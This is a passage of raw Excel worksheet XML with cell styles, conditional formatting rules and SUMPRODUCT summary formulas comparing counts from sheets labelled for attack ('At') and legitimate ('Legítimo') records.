      <c r="V1083" s="1"/>
      <c r="W1083" s="1"/>
      <c r="X1083" s="1"/>
      <c r="Y1083" s="1"/>
      <c r="Z1083" s="1"/>
      <c r="AA1083" s="1"/>
      <c r="AB1083" s="1"/>
      <c r="AC1083" s="1"/>
      <c r="AD1083" s="1"/>
      <c r="AE1083" s="3"/>
      <c r="AF1083" s="3"/>
      <c r="AG1083" s="3"/>
      <c r="AH1083" s="3"/>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row>
    <row r="1084" spans="1:93" s="7" customFormat="1" ht="15.75" customHeight="1">
      <c r="A1084" s="15"/>
      <c r="B1084" s="3"/>
      <c r="C1084" s="3"/>
      <c r="D1084" s="1"/>
      <c r="E1084" s="1"/>
      <c r="F1084" s="3"/>
      <c r="G1084" s="3"/>
      <c r="H1084" s="3"/>
      <c r="I1084" s="3"/>
      <c r="J1084" s="3"/>
      <c r="K1084" s="1"/>
      <c r="L1084" s="1"/>
      <c r="M1084" s="1"/>
      <c r="N1084" s="1"/>
      <c r="O1084" s="1"/>
      <c r="P1084" s="1"/>
      <c r="Q1084" s="1"/>
      <c r="R1084" s="1"/>
      <c r="S1084" s="1"/>
      <c r="T1084" s="1"/>
      <c r="U1084" s="1"/>
      <c r="V1084" s="1"/>
      <c r="W1084" s="1"/>
      <c r="X1084" s="1"/>
      <c r="Y1084" s="1"/>
      <c r="Z1084" s="1"/>
      <c r="AA1084" s="1"/>
      <c r="AB1084" s="1"/>
      <c r="AC1084" s="1"/>
      <c r="AD1084" s="1"/>
      <c r="AE1084" s="3"/>
      <c r="AF1084" s="3"/>
      <c r="AG1084" s="3"/>
      <c r="AH1084" s="3"/>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row>
    <row r="1085" spans="1:93" s="7" customFormat="1" ht="15.75" customHeight="1">
      <c r="A1085" s="15"/>
      <c r="B1085" s="3"/>
      <c r="C1085" s="3"/>
      <c r="D1085" s="1"/>
      <c r="E1085" s="1"/>
      <c r="F1085" s="3"/>
      <c r="G1085" s="3"/>
      <c r="H1085" s="3"/>
      <c r="I1085" s="3"/>
      <c r="J1085" s="3"/>
      <c r="K1085" s="1"/>
      <c r="L1085" s="1"/>
      <c r="M1085" s="1"/>
      <c r="N1085" s="1"/>
      <c r="O1085" s="1"/>
      <c r="P1085" s="1"/>
      <c r="Q1085" s="1"/>
      <c r="R1085" s="1"/>
      <c r="S1085" s="1"/>
      <c r="T1085" s="1"/>
      <c r="U1085" s="1"/>
      <c r="V1085" s="1"/>
      <c r="W1085" s="1"/>
      <c r="X1085" s="1"/>
      <c r="Y1085" s="1"/>
      <c r="Z1085" s="1"/>
      <c r="AA1085" s="1"/>
      <c r="AB1085" s="1"/>
      <c r="AC1085" s="1"/>
      <c r="AD1085" s="1"/>
      <c r="AE1085" s="3"/>
      <c r="AF1085" s="3"/>
      <c r="AG1085" s="3"/>
      <c r="AH1085" s="3"/>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row>
    <row r="1086" spans="1:93" s="7" customFormat="1" ht="15.75" customHeight="1">
      <c r="A1086" s="15"/>
      <c r="B1086" s="3"/>
      <c r="C1086" s="3"/>
      <c r="D1086" s="1"/>
      <c r="E1086" s="1"/>
      <c r="F1086" s="3"/>
      <c r="G1086" s="3"/>
      <c r="H1086" s="3"/>
      <c r="I1086" s="3"/>
      <c r="J1086" s="3"/>
      <c r="K1086" s="1"/>
      <c r="L1086" s="1"/>
      <c r="M1086" s="1"/>
      <c r="N1086" s="1"/>
      <c r="O1086" s="1"/>
      <c r="P1086" s="1"/>
      <c r="Q1086" s="1"/>
      <c r="R1086" s="1"/>
      <c r="S1086" s="1"/>
      <c r="T1086" s="1"/>
      <c r="U1086" s="1"/>
      <c r="V1086" s="1"/>
      <c r="W1086" s="1"/>
      <c r="X1086" s="1"/>
      <c r="Y1086" s="1"/>
      <c r="Z1086" s="1"/>
      <c r="AA1086" s="1"/>
      <c r="AB1086" s="1"/>
      <c r="AC1086" s="1"/>
      <c r="AD1086" s="1"/>
      <c r="AE1086" s="3"/>
      <c r="AF1086" s="3"/>
      <c r="AG1086" s="3"/>
      <c r="AH1086" s="3"/>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row>
  </sheetData>
  <autoFilter ref="A2:AC79" xr:uid="{00000000-0009-0000-0000-00000B000000}"/>
  <mergeCells count="22">
    <mergeCell ref="A79:C79"/>
    <mergeCell ref="AQ1:AV1"/>
    <mergeCell ref="AW1:BB1"/>
    <mergeCell ref="BC1:BH1"/>
    <mergeCell ref="BI1:BN1"/>
    <mergeCell ref="G1:L1"/>
    <mergeCell ref="M1:R1"/>
    <mergeCell ref="S1:X1"/>
    <mergeCell ref="Y1:AD1"/>
    <mergeCell ref="AE1:AJ1"/>
    <mergeCell ref="AK1:AP1"/>
    <mergeCell ref="A1:A2"/>
    <mergeCell ref="B1:B2"/>
    <mergeCell ref="C1:C2"/>
    <mergeCell ref="D1:D2"/>
    <mergeCell ref="E1:E2"/>
    <mergeCell ref="H81:Q81"/>
    <mergeCell ref="F1:F2"/>
    <mergeCell ref="CB1:CH1"/>
    <mergeCell ref="BO1:BU1"/>
    <mergeCell ref="BV1:CA1"/>
    <mergeCell ref="K80:Q80"/>
  </mergeCells>
  <conditionalFormatting sqref="K3:K78 Q3:Q78 W3:W78">
    <cfRule type="expression" dxfId="272" priority="63">
      <formula>IF(K3=1,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="271" priority="62">
      <formula>IF(K3=0,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L3:L78">
    <cfRule type="expression" dxfId="270" priority="42">
      <formula>IF(L3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="R3:R78">
    <cfRule type="expression" dxfId="269" priority="41">
      <formula>IF(R3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="S3:T78">
    <cfRule type="expression" dxfId="268" priority="4">
      <formula>IF(OR(S3&lt;G3,S3&lt;M3),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="V3:X78">
    <cfRule type="expression" dxfId="267" priority="1">
      <formula>IF(OR(V3&lt;J3,V3&lt;P3),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="W3:W78 K3:K78 Q3:Q78">
    <cfRule type="expression" dxfId="266" priority="61">
      <formula>IF(K3=0.5,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="X3:X78">
    <cfRule type="expression" dxfId="265" priority="40">
      <formula>IF(X3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="Y3:Y78">
    <cfRule type="expression" dxfId="264" priority="10">
      <formula>IF(Y3&lt;G3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="Z3">
    <cfRule type="expression" dxfId="263" priority="9">
      <formula>IF(Z3&lt;H3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AB3:AE78">
    <cfRule type="expression" dxfId="262" priority="6">
      <formula>IF(AB3&lt;J3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AC3:AC78">
    <cfRule type="expression" dxfId="261" priority="12">
      <formula>IF(AC3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="260" priority="13">
      <formula>IF(AC3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="259" priority="14">
      <formula>IF(AC3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AD3:AD78">
    <cfRule type="expression" dxfId="258" priority="11">
      <formula>IF(AD3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AF3">
    <cfRule type="expression" dxfId="257" priority="27">
      <formula>IF(AF3&lt;N3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AH3:AK78">
    <cfRule type="expression" dxfId="256" priority="19">
      <formula>IF(AH3&lt;P3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AI3:AI78">
    <cfRule type="expression" dxfId="255" priority="30">
      <formula>IF(AI3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="254" priority="31">
      <formula>IF(AI3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="253" priority="32">
      <formula>IF(AI3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AJ3:AJ78">
    <cfRule type="expression" dxfId="252" priority="29">
      <formula>IF(AJ3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AL3">
    <cfRule type="expression" dxfId="251" priority="18">
      <formula>IF(AL3&lt;T3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AN3:AP78">
    <cfRule type="expression" dxfId="250" priority="15">
      <formula>IF(AN3&lt;V3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AO3:AO78">
    <cfRule type="expression" dxfId="249" priority="21">
      <formula>IF(AO3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="248" priority="22">
      <formula>IF(AO3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="247" priority="23">
      <formula>IF(AO3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AP3:AP78">
    <cfRule type="expression" dxfId="246" priority="20">
      <formula>IF(AP3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AU3:AU78 BA3:BA78">
    <cfRule type="expression" dxfId="245" priority="58">
      <formula>IF(AU3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="244" priority="59">
      <formula>IF(AU3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="243" priority="60">
      <formula>IF(AU3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AV3:AV78">
    <cfRule type="expression" dxfId="242" priority="39">
      <formula>IF(AV3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BB3:BB78">
    <cfRule type="expression" dxfId="241" priority="38">
      <formula>IF(BB3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BG3:BG78">
    <cfRule type="expression" dxfId="240" priority="55">
      <formula>IF(BG3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="239" priority="56">
      <formula>IF(BG3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="238" priority="57">
      <formula>IF(BG3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BH3:BH78">
    <cfRule type="expression" dxfId="237" priority="37">
      <formula>IF(BH3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BM3:BM78">
    <cfRule type="expression" dxfId="236" priority="44">
      <formula>IF(BM3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="235" priority="45">
      <formula>IF(BM3=1,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="234" priority="43">
      <formula>IF(BM3=0.5,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BN3:BN78">
    <cfRule type="expression" dxfId="233" priority="36">
      <formula>IF(BN3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BT3:BT78">
    <cfRule type="expression" dxfId="232" priority="46">
      <formula>IF(BT3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="231" priority="47">
      <formula>IF(BT3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="230" priority="48">
      <formula>IF(BT3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BU3:BU78">
    <cfRule type="expression" dxfId="229" priority="35">
      <formula>IF(BU3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BZ3:BZ78">
    <cfRule type="expression" dxfId="228" priority="49">
      <formula>IF(BZ3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="227" priority="50">
      <formula>IF(BZ3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="226" priority="51">
      <formula>IF(BZ3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="CA3:CA78">
    <cfRule type="expression" dxfId="225" priority="34">
      <formula>IF(CA3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="CG3:CG78">
    <cfRule type="expression" dxfId="224" priority="52">
      <formula>IF(CG3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="223" priority="53">
      <formula>IF(CG3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="222" priority="54">
      <formula>IF(CG3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="CH3:CH78">
    <cfRule type="expression" dxfId="221" priority="33">
      <formula>IF(CH3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" scale="1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tabColor rgb="FFFF3F68"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:S36"/>
  <sheetViews>
    <sheetView zoomScale="130" zoomScaleNormal="130" workbookViewId="0">
      <pane xSplit="1" ySplit="2" topLeftCell="I3" activePane="bottomRight" state="frozen"/>
      <selection activeCell="Q6" sqref="Q6"/>
      <selection pane="topRight" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomLeft" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomRight" activeCell="M18" sqref="M18"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.42578125" defaultRowHeight="12.75"/>
  <cols>
    <col min="1" max="1" width="25.140625" style="26" customWidth="1"/>
    <col min="2" max="2" width="11" style="26" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="11.42578125" style="26" customWidth="1"/>
    <col min="4" max="4" width="11" style="26" customWidth="1"/>
    <col min="5" max="5" width="11.42578125" style="26" customWidth="1"/>
    <col min="6" max="7" width="11" style="26" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="11.42578125" style="26" customWidth="1"/>
    <col min="9" max="9" width="11" style="26" customWidth="1"/>
    <col min="10" max="10" width="11.85546875" style="214" customWidth="1"/>
    <col min="11" max="11" width="15" style="26" customWidth="1"/>
    <col min="12" max="12" width="22.28515625" style="26" customWidth="1"/>
    <col min="13" max="13" width="15.85546875" style="26" customWidth="1"/>
    <col min="14" max="14" width="28.5703125" style="26" customWidth="1"/>
    <col min="15" max="15" width="14.5703125" style="26" customWidth="1"/>
    <col min="16" max="16384" width="11.42578125" style="26"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:19">
      <c r="A1" s="146"/>
      <c r="B1" s="713" t="s">
        <v>2348</v>
      </c>
      <c r="C1" s="714"/>
      <c r="D1" s="714"/>
      <c r="E1" s="714"/>
      <c r="F1" s="714"/>
      <c r="G1" s="714"/>
      <c r="H1" s="714"/>
      <c r="I1" s="714"/>
      <c r="J1" s="714"/>
      <c r="K1" s="701" t="s">
        <v>680</v>
      </c>
      <c r="L1" s="702"/>
      <c r="M1" s="703" t="s">
        <v>681</v>
      </c>
      <c r="N1" s="704"/>
    </row>
    <row r="2" spans="1:19" ht="25.5" customHeight="1" thickBot="1">
      <c r="A2" s="442" t="s">
        <v>641</v>
      </c>
      <c r="B2" s="438" t="s">
        <v>0</v>
      </c>
      <c r="C2" s="21" t="s">
        <v>1</v>
      </c>
      <c r="D2" s="21" t="s">
        <v>2</v>
      </c>
      <c r="E2" s="21" t="s">
        <v>3</v>
      </c>
      <c r="F2" s="21" t="s">
        <v>1758</v>
      </c>
      <c r="G2" s="21" t="s">
        <v>1759</v>
      </c>
      <c r="H2" s="21" t="s">
        <v>1760</v>
      </c>
      <c r="I2" s="21" t="s">
        <v>1761</v>
      </c>
      <c r="J2" s="310" t="s">
        <v>1762</v>
      </c>
      <c r="K2" s="416" t="s">
        <v>2349</v>
      </c>
      <c r="L2" s="417" t="s">
        <v>2468</v>
      </c>
      <c r="M2" s="419" t="s">
        <v>2349</v>
      </c>
      <c r="N2" s="420" t="s">
        <v>2469</v>
      </c>
      <c r="S2" s="214"/>
    </row>
    <row r="3" spans="1:19" ht="15" customHeight="1">
      <c r="A3" s="443" t="s">
        <v>4463</v>
      </c>
      <c r="B3" s="717">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$E$79</f>
        <v>3573695</v>
      </c>
      <c r="C3" s="717"/>
      <c r="D3" s="717"/>
      <c r="E3" s="717"/>
      <c r="F3" s="717"/>
      <c r="G3" s="717"/>
      <c r="H3" s="717"/>
      <c r="I3" s="717"/>
      <c r="J3" s="717"/>
      <c r="K3" s="717"/>
      <c r="L3" s="717"/>
      <c r="M3" s="717"/>
      <c r="N3" s="718"/>
      <c r="S3" s="214"/>
    </row>
    <row r="4" spans="1:19" ht="15" customHeight="1">
      <c r="A4" s="444" t="s">
        <v>4464</v>
      </c>
      <c r="B4" s="719">
        <f>'Tabla 3 (Legítimo)'!$B$3</f>
        <v>78694206</v>
      </c>
      <c r="C4" s="719"/>
      <c r="D4" s="719"/>
      <c r="E4" s="719"/>
      <c r="F4" s="719"/>
      <c r="G4" s="719"/>
      <c r="H4" s="719"/>
      <c r="I4" s="719"/>
      <c r="J4" s="719"/>
      <c r="K4" s="719"/>
      <c r="L4" s="719"/>
      <c r="M4" s="719"/>
      <c r="N4" s="720"/>
      <c r="S4" s="214"/>
    </row>
    <row r="5" spans="1:19" ht="15" customHeight="1" thickBot="1">
      <c r="A5" s="445" t="s">
        <v>4465</v>
      </c>
      <c r="B5" s="719">
        <f>$B$4+$B$3</f>
        <v>82267901</v>
      </c>
      <c r="C5" s="719"/>
      <c r="D5" s="719"/>
      <c r="E5" s="719"/>
      <c r="F5" s="719"/>
      <c r="G5" s="719"/>
      <c r="H5" s="719"/>
      <c r="I5" s="719"/>
      <c r="J5" s="719"/>
      <c r="K5" s="719"/>
      <c r="L5" s="719"/>
      <c r="M5" s="719"/>
      <c r="N5" s="720"/>
      <c r="O5" s="725" t="s">
        <v>658</v>
      </c>
      <c r="P5" s="726"/>
      <c r="S5" s="214"/>
    </row>
    <row r="6" spans="1:19" ht="15" customHeight="1">
      <c r="A6" s="478" t="s">
        <v>4453</v>
      </c>
      <c r="B6" s="439">
        <f>SUMPRODUCT('T2 (At) S&lt;=1, FG&gt;=4'!$D3:$D$78,'T2 (At) S&lt;=1, FG&gt;=4'!K3:K78)</f>
        <v>9</v>
      </c>
      <c r="C6" s="44">
        <f>SUMPRODUCT('T2 (At) S&lt;=1, FG&gt;=4'!$D3:$D$78,'T2 (At) S&lt;=1, FG&gt;=4'!Q3:Q78)</f>
        <v>37</v>
      </c>
      <c r="D6" s="44">
        <f>SUMPRODUCT('T2 (At) S&lt;=1, FG&gt;=4'!$D3:$D$78,'T2 (At) S&lt;=1, FG&gt;=4'!W3:W78)</f>
        <v>42</v>
      </c>
      <c r="E6" s="482">
        <f>SUMPRODUCT('T2 (At) S&lt;=1, FG&gt;=4'!$D3:$D$78,'T2 (At) S&lt;=1, FG&gt;=4'!AC3:AC78)</f>
        <v>76</v>
      </c>
      <c r="F6" s="482">
        <f>SUMPRODUCT('T2 (At) S&lt;=1, FG&gt;=4'!$D3:$D$78,'T2 (At) S&lt;=1, FG&gt;=4'!AI3:AI78)</f>
        <v>47</v>
      </c>
      <c r="G6" s="482">
        <f>SUMPRODUCT('T2 (At) S&lt;=1, FG&gt;=4'!$D3:$D$78,'T2 (At) S&lt;=1, FG&gt;=4'!AO3:AO78)</f>
        <v>82</v>
      </c>
      <c r="H6" s="44">
        <f>SUMPRODUCT('T2 (At) S&lt;=1, FG&gt;=4'!$D3:$D$78,'T2 (At) S&lt;=1, FG&gt;=4'!AU3:AU78)</f>
        <v>1</v>
      </c>
      <c r="I6" s="44">
        <f>SUMPRODUCT('T2 (At) S&lt;=1, FG&gt;=4'!$D3:$D$78,'T2 (At) S&lt;=1, FG&gt;=4'!BA3:BA78)</f>
        <v>23</v>
      </c>
      <c r="J6" s="44">
        <f>SUMPRODUCT('T2 (At) S&lt;=1, FG&gt;=4'!$D3:$D$78,'T2 (At) S&lt;=1, FG&gt;=4'!BG3:BG78)</f>
        <v>50</v>
      </c>
      <c r="K6" s="433">
        <f>SUMPRODUCT('T2 (At) S&lt;=1, FG&gt;=4'!$D3:$D$78,'T2 (At) S&lt;=1, FG&gt;=4'!BM3:BM78)</f>
        <v>45.333333333333336</v>
      </c>
      <c r="L6" s="307">
        <f>SUMPRODUCT('T2 (At) S&lt;=1, FG&gt;=4'!$D3:$D$78,'T2 (At) S&lt;=1, FG&gt;=4'!BT3:BT78)</f>
        <v>95.333333333333329</v>
      </c>
      <c r="M6" s="433">
        <f>SUMPRODUCT('T2 (At) S&lt;=1, FG&gt;=4'!$D3:$D$78,'T2 (At) S&lt;=1, FG&gt;=4'!BZ3:BZ78)</f>
        <v>19</v>
      </c>
      <c r="N6" s="307">
        <f>SUMPRODUCT('T2 (At) S&lt;=1, FG&gt;=4'!$D3:$D$78,'T2 (At) S&lt;=1, FG&gt;=4'!CG3:CG78)</f>
        <v>55</v>
      </c>
      <c r="O6" s="723" t="s">
        <v>667</v>
      </c>
      <c r="P6" s="724"/>
      <c r="S6" s="214"/>
    </row>
    <row r="7" spans="1:19" ht="15" customHeight="1">
      <c r="A7" s="479" t="s">
        <v>4454</v>
      </c>
      <c r="B7" s="440">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$D$79 - B6</f>
        <v>101</v>
      </c>
      <c r="C7" s="284">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$D$79 - C6</f>
        <v>73</v>
      </c>
      <c r="D7" s="284">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$D$79 - D6</f>
        <v>68</v>
      </c>
      <c r="E7" s="284">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$D$79 - E6</f>
        <v>34</v>
      </c>
      <c r="F7" s="284">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$D$79 - F6</f>
        <v>63</v>
      </c>
      <c r="G7" s="284">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$D$79 - G6</f>
        <v>28</v>
      </c>
      <c r="H7" s="284">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$D$79 - H6</f>
        <v>109</v>
      </c>
      <c r="I7" s="284">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$D$79 - I6</f>
        <v>87</v>
      </c>
      <c r="J7" s="284">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$D$79 - J6</f>
        <v>60</v>
      </c>
      <c r="K7" s="434">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$D$79 - K6</f>
        <v>64.666666666666657</v>
      </c>
      <c r="L7" s="435">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$D$79 - L6</f>
        <v>14.666666666666671</v>
      </c>
      <c r="M7" s="434">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$D$79 - M6</f>
        <v>91</v>
      </c>
      <c r="N7" s="435">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$D$79 - N6</f>
        <v>55</v>
      </c>
      <c r="O7" s="723"/>
      <c r="P7" s="724"/>
      <c r="S7" s="214"/>
    </row>
    <row r="8" spans="1:19" ht="15" customHeight="1">
      <c r="A8" s="446" t="s">
        <v>4148</v>
      </c>
      <c r="B8" s="519">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!G79</f>
        <v>362</v>
      </c>
      <c r="C8" s="520">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!M79</f>
        <v>7237</v>
      </c>
      <c r="D8" s="520">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!S79</f>
        <v>7599</v>
      </c>
      <c r="E8" s="586">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!Y79</f>
        <v>943674</v>
      </c>
      <c r="F8" s="586">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!AE79</f>
        <v>21477</v>
      </c>
      <c r="G8" s="586">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!AK79</f>
        <v>965082</v>
      </c>
      <c r="H8" s="520">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!AQ79</f>
        <v>16</v>
      </c>
      <c r="I8" s="284">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!AW79</f>
        <v>2771</v>
      </c>
      <c r="J8" s="304">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!BC79</f>
        <v>10354</v>
      </c>
      <c r="K8" s="460">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!BI79</f>
        <v>456</v>
      </c>
      <c r="L8" s="308">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!BO79</f>
        <v>354219</v>
      </c>
      <c r="M8" s="460">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!BV79</f>
        <v>19771</v>
      </c>
      <c r="N8" s="308">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!CB79</f>
        <v>3992941</v>
      </c>
      <c r="O8" s="556"/>
      <c r="S8" s="214"/>
    </row>
    <row r="9" spans="1:19" ht="15" customHeight="1" thickBot="1">
      <c r="A9" s="565" t="s">
        <v>4455</v>
      </c>
      <c r="B9" s="523">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!H79</f>
        <v>83</v>
      </c>
      <c r="C9" s="524">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!N79</f>
        <v>1223</v>
      </c>
      <c r="D9" s="524">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!T79</f>
        <v>1306</v>
      </c>
      <c r="E9" s="587">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!Z79</f>
        <v>200430</v>
      </c>
      <c r="F9" s="587">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!AF79</f>
        <v>3309</v>
      </c>
      <c r="G9" s="587">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!AL79</f>
        <v>203672</v>
      </c>
      <c r="H9" s="524">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!AR79</f>
        <v>2</v>
      </c>
      <c r="I9" s="285">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!AX79</f>
        <v>1702</v>
      </c>
      <c r="J9" s="306">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!BD79</f>
        <v>3006</v>
      </c>
      <c r="K9" s="461">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!BJ79</f>
        <v>345</v>
      </c>
      <c r="L9" s="309">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!BP79</f>
        <v>343171</v>
      </c>
      <c r="M9" s="461">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!BW79</f>
        <v>19761</v>
      </c>
      <c r="N9" s="309">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!CC79</f>
        <v>2488061</v>
      </c>
      <c r="O9" s="554"/>
      <c r="S9" s="214"/>
    </row>
    <row r="10" spans="1:19" ht="15" customHeight="1" thickTop="1">
      <c r="A10" s="562" t="s">
        <v>4451</v>
      </c>
      <c r="B10" s="481">
        <f>'Tabla 3 (Legítimo)'!B$44</f>
        <v>6395</v>
      </c>
      <c r="C10" s="482">
        <f>'Tabla 3 (Legítimo)'!C$44</f>
        <v>169036</v>
      </c>
      <c r="D10" s="482">
        <f>'Tabla 3 (Legítimo)'!D$44</f>
        <v>175400</v>
      </c>
      <c r="E10" s="482">
        <f>'Tabla 3 (Legítimo)'!E$44</f>
        <v>1067860</v>
      </c>
      <c r="F10" s="482">
        <f>'Tabla 3 (Legítimo)'!F$44</f>
        <v>421616</v>
      </c>
      <c r="G10" s="482">
        <f>'Tabla 3 (Legítimo)'!G$44</f>
        <v>1243621</v>
      </c>
      <c r="H10" s="482">
        <f>'Tabla 3 (Legítimo)'!H$44</f>
        <v>6398</v>
      </c>
      <c r="I10" s="43">
        <f>'Tabla 3 (Legítimo)'!I$44</f>
        <v>14498</v>
      </c>
      <c r="J10" s="305">
        <f>'Tabla 3 (Legítimo)'!J$44</f>
        <v>182455</v>
      </c>
      <c r="K10" s="521">
        <f>'Tabla 3 (Legítimo)'!K$44</f>
        <v>4224014</v>
      </c>
      <c r="L10" s="522">
        <f>'Tabla 3 (Legítimo)'!L$44</f>
        <v>17178374</v>
      </c>
      <c r="M10" s="521">
        <f>'Tabla 3 (Legítimo)'!M$44</f>
        <v>28</v>
      </c>
      <c r="N10" s="522">
        <f>'Tabla 3 (Legítimo)'!N$44</f>
        <v>24694</v>
      </c>
      <c r="O10" s="723" t="s">
        <v>668</v>
      </c>
      <c r="P10" s="724"/>
      <c r="S10" s="214"/>
    </row>
    <row r="11" spans="1:19" ht="15" customHeight="1">
      <c r="A11" s="563" t="s">
        <v>4452</v>
      </c>
      <c r="B11" s="440">
        <f>'Tabla 3 (Legítimo)'!B45</f>
        <v>78687811</v>
      </c>
      <c r="C11" s="284">
        <f>'Tabla 3 (Legítimo)'!C45</f>
        <v>78525170</v>
      </c>
      <c r="D11" s="284">
        <f>'Tabla 3 (Legítimo)'!D45</f>
        <v>78518806</v>
      </c>
      <c r="E11" s="284">
        <f>'Tabla 3 (Legítimo)'!E45</f>
        <v>77626346</v>
      </c>
      <c r="F11" s="284">
